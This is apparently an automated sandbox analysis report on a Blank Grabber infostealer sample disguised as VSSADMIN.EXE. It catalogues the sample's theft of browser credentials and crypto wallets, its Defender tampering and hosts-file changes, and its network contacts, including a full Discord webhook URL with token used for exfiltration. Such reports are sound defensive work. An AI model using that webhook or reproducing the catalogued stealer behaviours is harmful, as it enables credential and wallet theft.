              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C989E0 cpuid 0_2_00007FF614C989E0
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C7B5B0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF614C7B5B0
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C94E50 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF614C94E50
              Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exeCode function: 59_2_00007FF6EE7748CC GetModuleFileNameW,GetVersionExW,LoadLibraryW,LoadLibraryW,59_2_00007FF6EE7748CC

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Modifies the hosts file
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Blank Grabber
              Source: Yara matchFile source: 00000000.00000003.188703701.0000024133485000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.246634028.0000024133487000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.244345388.0000014C6D074000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.188703701.0000024133487000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.244090909.0000014C6DD8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.244259837.0000014C6D074000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.244317157.0000014C6CDAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.244872297.0000014C6D074000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: VSSADMIN.EXE.exe PID: 6856, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: VSSADMIN.EXE.exe PID: 6872, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI68562\rarreg.key, type: DROPPED
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Electrum
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxxz
              Source: VSSADMIN.EXE.exe, 00000001.00000002.245250730.0000014C6D658000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: VSSADMIN.EXE.exe, 00000001.00000002.245250730.0000014C6D658000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Exodusz
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Ethereum
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldbJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\21e53dbb-a709-4aa9-8d37-2ac6403c74f8Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: Yara matchFile source: 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: VSSADMIN.EXE.exe PID: 6872, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected Blank Grabber
              Source: Yara matchFile source: 00000000.00000003.188703701.0000024133485000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.246634028.0000024133487000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.244345388.0000014C6D074000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.188703701.0000024133487000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.244090909.0000014C6DD8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.244259837.0000014C6D074000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.244317157.0000014C6CDAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.244872297.0000014C6D074000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: VSSADMIN.EXE.exe PID: 6856, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: VSSADMIN.EXE.exe PID: 6872, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI68562\rarreg.key, type: DROPPED
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FFD3FBF2B62 bind,WSAGetLastError,1_2_00007FFD3FBF2B62

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts11
              Windows Management Instrumentation              		11
              DLL Side-Loading              		11
              DLL Side-Loading              		1
              File and Directory Permissions Modification              		1
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		Exfiltration Over Other Network Medium1
              Ingress Tool Transfer              		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
              Data Encrypted for Impact
              Default Accounts1
              Native API              		12
              Registry Run Keys / Startup Folder              		1
              Access Token Manipulation              		3
              Disable or Modify Tools              		LSASS Memory2
              File and Directory Discovery              		Remote Desktop Protocol2
              Data from Local System              		Exfiltration Over Bluetooth21
              Encrypted Channel              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization1
              System Shutdown/Reboot
              Domain Accounts212
              Command and Scripting Interpreter              		Logon Script (Windows)11
              Process Injection              		11
              Deobfuscate/Decode Files or Information              		Security Account Manager36
              System Information Discovery              		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
              Non-Application Layer Protocol              		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local Accounts3
              PowerShell              		Logon Script (Mac)12
              Registry Run Keys / Startup Folder              		21
              Obfuscated Files or Information              		NTDS141
              Security Software Discovery              		Distributed Component Object ModelInput CaptureScheduled Transfer4
              Application Layer Protocol              		SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
              Software Packing              		LSA Secrets2
              Process Discovery              		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common11
              DLL Side-Loading              		Cached Domain Credentials41
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items1
              Masquerading              		DCSync1
              Application Window Discovery              		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
              Modify Registry              		Proc Filesystem1
              Remote System Discovery              		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)41
              Virtualization/Sandbox Evasion              		/etc/passwd and /etc/shadow1
              System Network Configuration Discovery              		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
              Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
              Access Token Manipulation              		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
              Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron11
              Process Injection              		Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1309234 Sample: VSSADMIN.EXE.exe Startdate: 15/09/2023 Architecture: WINDOWS Score: 100 75 tse1.mm.bing.net 2->75 97 Found malware configuration 2->97 99 Antivirus detection for URL or domain 2->99 101 Multi AV Scanner detection for dropped file 2->101 103 3 other signatures 2->103 11 VSSADMIN.EXE.exe 22 2->11         started        signatures3 process4 file5 65 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 11->65 dropped 67 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32+ 11->67 dropped 69 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 11->69 dropped 71 16 other malicious files 11->71 dropped 121 Very long command line found 11->121 123 May check the online IP address of the machine 11->123 125 Drops PE files with a suspicious file extension 11->125 127 5 other signatures 11->127 15 VSSADMIN.EXE.exe 1 54 11->15         started        signatures6 process7 dnsIp8 77 discord.com 162.159.138.232, 443, 49718 CLOUDFLARENETUS United States 15->77 79 ip-api.com 208.95.112.1, 49715, 49717, 80 TUT-ASUS United States 15->79 81 blank-2md3e.in 15->81 55 C:\ProgramData\Microsoft\Windows\...\???.scr, PE32+ 15->55 dropped 57 C:\Windows\System32\drivers\etc\hosts, ASCII 15->57 dropped 59 C:\Users\user\AppData\...\WUTJSCBCFX.png, ASCII 15->59 dropped 61 2 other malicious files 15->61 dropped 85 Very long command line found 15->85 87 Found many strings related to Crypto-Wallets (likely being stolen) 15->87 89 Tries to harvest and steal browser information (history, passwords, etc) 15->89 91 5 other signatures 15->91 20 cmd.exe 1 15->20         started        23 cmd.exe 15->23         started        25 cmd.exe 1 15->25         started        27 21 other processes 15->27 file9 signatures10 process11 signatures12 105 Suspicious powershell command line found 20->105 107 Very long command line found 20->107 109 Uses cmd line tools excessively to alter registry or file data 20->109 111 Bypasses PowerShell execution policy 20->111 43 2 other processes 20->43 113 Encrypted powershell cmdline option found 23->113 29 powershell.exe 23->29         started        32 conhost.exe 23->32         started        115 Modifies Windows Defender protection settings 25->115 117 Removes signatures from Windows Defender 25->117 34 powershell.exe 19 25->34         started        45 2 other processes 25->45 119 Adds a directory exclusion to Windows Defender 27->119 37 WMIC.exe 1 27->37         started        39 WMIC.exe 27->39         started        41 WMIC.exe 27->41         started        47 39 other processes 27->47 process13 dnsIp14 73 C:\Users\user\AppData\...\ozweafg0.cmdline, Unicode 29->73 dropped 50 csc.exe 29->50         started        93 Potential dropper URLs found in powershell memory 34->93 95 DLL side loading technique detected 37->95 83 192.168.2.1 unknown unknown 47->83 file15 signatures16 process17 file18 63 C:\Users\user\AppData\Local\...\ozweafg0.dll, PE32 50->63 dropped 53 cvtres.exe 50->53         started        process19

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              VSSADMIN.EXE.exe24%ReversingLabsWin64.Trojan.Generic

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ???.scr24%ReversingLabsWin64.Trojan.Generic
              C:\Users\user\AppData\Local\Temp\_MEI68562\VCRUNTIME140.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI68562\_bz2.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI68562\_ctypes.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI68562\_decimal.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI68562\_hashlib.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI68562\_lzma.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI68562\_queue.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI68562\_socket.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI68562\_sqlite3.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI68562\_ssl.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI68562\libcrypto-1_1.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI68562\libffi-8.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI68562\libssl-1_1.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI68562\python311.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI68562\select.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI68562\sqlite3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI68562\unicodedata.pyd0%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%Avira URL Cloudsafe
              http://www.microsoftDOWNLO~1JSOy.00%Avira URL Cloudsafe
              http://cacerts.digi0%Avira URL Cloudsafe
              https://api.anonfiles.com/upload0%Avira URL Cloudsafe
              https://discord.com/api/v9/users/0%Avira URL Cloudsafe
              https://blank-2MD3E.in0%Avira URL Cloudsafe
              https://go.micro0%Avira URL Cloudsafe
              http://www.cl.cam.ac.uk/~mgk25/iso-time.html0%Avira URL Cloudsafe
              https://contoso.com/Icon0%Avira URL Cloudsafe
              http://pesterbdd.com/images/Pester.png100%Avira URL Cloudmalware
              http://crl.globalT0%Avira URL Cloudsafe
              http://crl.comodoca.p0%Avira URL Cloudsafe
              http://crl.micro0%Avira URL Cloudsafe
              https://api.anonfiles.com/uploadr0%Avira URL Cloudsafe
              http://go.microsoft.c0%Avira URL Cloudsafe
              http://go.microsoft.ctain0%Avira URL Cloudsafe
              https://foss.heptapod.net/pypy/pypy/-/issues/35390%Avira URL Cloudsafe
              https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png0%Avira URL Cloudsafe
              https://contoso.com/License0%Avira URL Cloudsafe
              http://ocsp.sectigo.com00%Avira URL Cloudsafe
              https://discord.com/api/webhooks/1125357329798418472/yWPfp1iKyx0rkQloEOr9Xk-aX81R6WKX-1QBrT7zz3erb7v9flhr6ifTFvcDhFyRvu2k0%Avira URL Cloudsafe
              http://ocsp.thawte.com00%Avira URL Cloudsafe
              https://sectigo.com/CPS00%Avira URL Cloudsafe
              https://contoso.com/0%Avira URL Cloudsafe
              http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%Avira URL Cloudsafe
              https://discord.com/api/webhooks/1125357329798418472/yWPfp1iKyx0rkQloEOr9Xk-aX81R6WKX-1QBrT7zz3erb7v0%Avira URL Cloudsafe
              https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz0%Avira URL Cloudsafe
              https://dotnet.micr0%Avira URL Cloudsafe
              http://www.microsoftESSAG~1.JSOy.00%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              discord.com
              		162.159.138.232
              		truetrue
                		unknown
                ip-api.com
                		208.95.112.1
                		truefalse
                  		high
                  blank-2md3e.in
                  		unknown
                  		unknownfalse
                    		unknown
                    tse1.mm.bing.net
                    		unknown
                    		unknownfalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://discord.com/api/webhooks/1125357329798418472/yWPfp1iKyx0rkQloEOr9Xk-aX81R6WKX-1QBrT7zz3erb7v9flhr6ifTFvcDhFyRvu2ktrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://ip-api.com/json/?fields=225545false
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
